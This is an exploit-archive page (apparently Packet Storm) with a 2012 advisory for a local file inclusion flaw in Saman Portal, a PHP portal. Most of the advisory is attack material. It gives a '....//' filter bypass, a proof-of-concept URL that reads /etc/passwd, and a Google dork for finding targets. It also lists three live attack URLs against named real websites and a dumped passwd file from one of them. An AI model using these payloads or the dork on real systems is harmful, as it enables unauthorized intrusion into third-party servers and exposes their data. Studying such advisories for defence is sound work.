exploit the possibilities

Saman Portal Local File Inclusion

Saman Portal Local File Inclusion
Posted Mar 7, 2012
Authored by TMT

Saman Portal suffers from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
MD5 | eb1eb50e503476ac39e4f12da19a4c43

Saman Portal Local File Inclusion

Change Mirror Download
===========================================================

[+] Title: [Iranian] Saman portal LFI
[+] Date: 2/28/12
[+] Author: TMT
[+] Mail: taktaz_m2800[a.t]yahoo.com
[+] Type: PHP
[+] Vendor or Software Link: http://www.sis-eg.com
[+] Customers: http://sis-eg.com/services/customers/
[+] Google dork: inurl:sismodule=user

============================================================
[~] desc:
Vuln in modules/sisRapid/pnuserapi.php on line 117

just "../" filtered to prevent LFI but "....//" will work


[~] poc:
http://www.site.com/index.php?module=cdk&func=loadmodule&system=cdk&sismodule=....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd



[~] Demo site:

http://isqi.co.ir/index.php?module=cdk&func=loadmodule&system=cdk&sismodule=....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd&sisOp=view&cnt_id=3036&ctp_id=3&id=59
http://www.bimehma.com/index.php?module=fdk&func=loadmodule&system=fdk&sismodule=....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd&sisOp=view&cnt_id=2687&ctp_id=26&id=12
http://www.epco.co.ir/index.php?module=cdk&func=loadmodule&system=cdk&sismodule=....//....//....//....//....//....//....//....//....//....//....//....//....///etc/passwd&sisOp=view&cnt_id=7&ctp_id=3&id=4&newlang=eng



root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin apache:x:498:500::/var/www:/bin/false
diradmin:x:497:497::/usr/local/directadmin:/bin/false mysql:x:496:496:MySQL
server:/var/lib/mysql:/bin/false webapps:x:500:501::/var/www/html:/bin/false
majordomo:x:495:2::/etc/virtual/majordomo:/bin/false
dovecot:x:494:494::/home/dovecot:/bin/false admin:x:501:502::/home/admin:/bin/bash
attari:x:502:504::/home/attari:/bin/bash

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close